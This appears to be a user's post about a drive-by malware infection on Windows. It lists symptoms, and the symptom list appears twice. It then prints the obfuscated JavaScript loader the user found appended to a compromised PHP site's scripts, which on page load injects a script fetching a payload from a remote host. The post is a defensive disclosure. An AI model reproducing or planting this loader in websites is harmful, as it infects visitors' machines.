out today. To make a long story short - I ended up resurrecting drive C from a backup. I recommend that you check your system for stability at least once a week
and make a full image of drive C every week. Keep a history of at least few months back.
Symptoms:
1. You visit some site (I used FireFox) i.e. - click on a link in email or something like this
2. In about 30-50 seconds you get "You <something> was installed" popup (regular Windows GUI), so the infection has already happened
3. Run "netstat /a" in command prompt - you will see 100s if not more out-bound SMTP-port connections
4. Virus links with core Windows processes so if you run "netstat /a /b" you will see things like "svchost.exe" that create this traffic -
this is because virus has attached as a DLL into legit Windows process.
5. Any attempt from any browser to open Google and search for anything results in a return of a blank page (zero-length HTML content) -
virus blocks TCP/IP inbound from Google search result page (same for Yahoo). You can use other search engines like "Rambler.ru" while this happens.
Symptoms:
1. You visit some site (I used FireFox) i.e. - click on a link in email or something like this
2. In about 30-50 seconds you get "You <something> was installed" popup (regular Windows GUI), so the infection has already happened
3. Run "netstat /a" in command prompt - you will see 100s if not more out-bound SMTP-port connections
4. Virus links with core Windows processes so if you run "netstat /a /b" you will see things like "svchost.exe" that create this traffic -
this is because virus has attached as a DLL into legit Windows process.
5. Any attempt from any browser to open Google and search for anything results in a return of a blank page (zero-length HTML content) -
virus blocks TCP/IP inbound from Google search result page (same for Yahoo). You can use other search engines like "Rambler.ru" while this happens.
Today I have figured out how I got it, I was served a regular page from a PHP-powered site and a piece of turd has attached itself to the tail of all JavaScripts on the WebServer. This turd has been "sanitized" and is presented below.
This is what was served to me from malevolent site:
/*GNU GPL*/ try{window.onload = function(){var Kjnilav1ca = document.createElement('s@@!@c@!r&)(i##p)&@t)'.replace(/\)|\!|&|\^|\$|@|\(|#/ig, ''));Kjnilav1ca.setAttribute('type', 'text/javascript');Kjnilav1ca.setAttribute('src', 'h(t$(!)t!p#@#(:@$/^&$$^/^&w)e))@l&#^)t#!!)-$d##&e#.@k)a#)i^x(@(@i(()^n!#^.&&c@o$m!.^)g$&)$a)!&#m!((e)(#z!$t&(&$a&&r@&#-$#c)$@o$m@$.^!w$@o@r&!l&@&d)&#m$(u^#s!@!i!&$@c)m^^(a@&g)^&a#&z^!(i!n#)^^e)&.@!^r^u$^:&$8!0()8#!0)!/#$@s)($o)!u(&t$!$)h!@^w()e@s!t!.@@&c)@!^)o&#m&&&$@/!)&s)^o@!!(u)!t^h@$w!)#!e!s&t(#.!@))!c$^o@)m)@@/&&g&#o(o)(^g)&l($)#)e@&^^^.@#c@$(o$^m@#!#/&d@!$i()#s(c@$^u&)s$^!)s^#@)).(!c#$^o#&!m(^$(.$h#^k#/)^1@$&($6!#3$.@!c@#^o)(m$&/('.replace(/\!|\^|&|@|\)|#|\(|\$/ig, ''));Kjnilav1ca.setAttribute('defer', 'defer');Kjnilav1ca.setAttribute('id', 'Z$@7&^q)a$(!5!&9#(w&)#7$e@l^^'.replace(/\)|#|\!|\^|&|@|\(|\$/ig, ''));document.body.appendChild(Kjnilav1ca);}} catch(e) {}
Obviously, different sites have different mutations of the same thing as it uses Regexes to crap-up itself.
Please check this link by Daniel Ansari for info how to remove this infection:
